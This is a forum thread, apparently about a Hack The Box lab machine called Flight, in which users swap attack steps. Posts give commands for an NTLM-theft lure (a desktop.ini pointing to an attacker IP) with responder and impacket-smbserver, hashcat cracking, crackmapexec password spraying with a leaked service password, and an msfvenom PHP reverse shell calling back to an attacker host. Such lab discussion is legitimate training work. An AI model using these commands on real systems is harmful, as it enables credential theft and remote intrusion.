Posts: 21 Threads: 0 Joined: N/A November 6, 2022 at 3:21 PM (November 6, 2022, 03:13 PM)loge23 Wrote: (November 6, 2022, 02:55 PM)kujen5 Wrote: (November 6, 2022, 02:46 PM)yumi Wrote: (November 6, 2022, 02:05 PM)kujen5 Wrote: I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help
(November 5, 2022, 09:22 PM)may123a Wrote: Tikkycoll_431012284 (c.bum)
how did u get the passwd
it as already informed here how to get the hash of c.brum:
create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini
upload on \\Shared
smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\
responder -I tun0 -v
after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini
actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/ (November 5, 2022, 11:22 PM)loge23 Wrote: crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
save users to file
crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from. Posts: 166 Threads: 0 Joined: N/A November 6, 2022 at 3:24 PM (November 6, 2022, 03:21 PM)kujen5 Wrote: (November 6, 2022, 03:13 PM)loge23 Wrote: (November 6, 2022, 02:55 PM)kujen5 Wrote: (November 6, 2022, 02:46 PM)yumi Wrote: (November 6, 2022, 02:05 PM)kujen5 Wrote: I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help
how did u get the passwd
it as already informed here how to get the hash of c.brum:
create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini
upload on \\Shared
smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\
responder -I tun0 -v
after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini
actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/ (November 5, 2022, 11:22 PM)loge23 Wrote: crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
save users to file
crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from. from svc_apache first step with SSRF Posts: 21 Threads: 0 Joined: N/A November 6, 2022 at 3:29 PM (November 6, 2022, 03:24 PM)yumi Wrote: (November 6, 2022, 03:21 PM)kujen5 Wrote: (November 6, 2022, 03:13 PM)loge23 Wrote: (November 6, 2022, 02:55 PM)kujen5 Wrote: (November 6, 2022, 02:46 PM)yumi Wrote: it as already informed here how to get the hash of c.brum:
create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini
upload on \\Shared
smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\
responder -I tun0 -v
after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini
actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/ (November 5, 2022, 11:22 PM)loge23 Wrote: crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
save users to file
crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from.
from svc_apache first step with SSRF and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that? Posts: 11 Threads: 0 Joined: N/A November 6, 2022 at 3:34 PM (November 6, 2022, 03:29 PM)kujen5 Wrote: (November 6, 2022, 03:24 PM)yumi Wrote: (November 6, 2022, 03:21 PM)kujen5 Wrote: (November 6, 2022, 03:13 PM)loge23 Wrote: (November 6, 2022, 02:55 PM)kujen5 Wrote: actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/ (November 5, 2022, 11:22 PM)loge23 Wrote: crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
save users to file
crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from.
from svc_apache first step with SSRF
and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that? browse the .ini file in your browser Posts: 28 Threads: 0 Joined: N/A November 6, 2022 at 3:35 PM (November 6, 2022, 03:29 PM)kujen5 Wrote: (November 6, 2022, 03:24 PM)yumi Wrote: (November 6, 2022, 03:21 PM)kujen5 Wrote: (November 6, 2022, 03:13 PM)loge23 Wrote: (November 6, 2022, 02:55 PM)kujen5 Wrote: actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/ (November 5, 2022, 11:22 PM)loge23 Wrote: crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
save users to file
crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from.
from svc_apache first step with SSRF
and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that? Try rebooting your box, wasn't working for me either for a while. After uploading the desktop.ini lure I captured the hash with 'impacket-smbserver -smb2support share .' But responder should work just as well. No need to trigger the user, must be an automated script on the box that opens explorer or something to trigger the auth. Posts: 45 Threads: 0 Joined: N/A November 6, 2022 at 3:50 PM Anyone have idea after getting a reverse shell as svc_apache? Posts: 21 Threads: 0 Joined: N/A November 6, 2022 at 3:54 PM any hint on the ssrf for foothold?
(November 6, 2022, 03:50 PM)hacker9999 Wrote: Anyone have idea after getting a reverse shell as svc_apache? how did you get a reverse shell Posts: 45 Threads: 0 Joined: N/A November 6, 2022 at 4:16 PM casga
try to have revshell from \\Web. I'm trying too
msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php Posts: 21 Threads: 0 Joined: N/A November 6, 2022 at 4:24 PM (November 6, 2022, 04:16 PM)hacker9999 Wrote: casga
try to have revshell from \\Web. I'm trying too
msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php my problem is how they got the 'S@Ss!K@*t13' password in the first place.. i have no clue about the ssrf and then after getting this passwd how'd they get the c.bum hash, since when uploading desktop.ini to shared on S.Moon it gives you the hash to S.Moon not c.bum Posts: 166 Threads: 0 Joined: N/A November 6, 2022 at 4:25 PM i get my php file deleted an shell crash in 1 minute. |
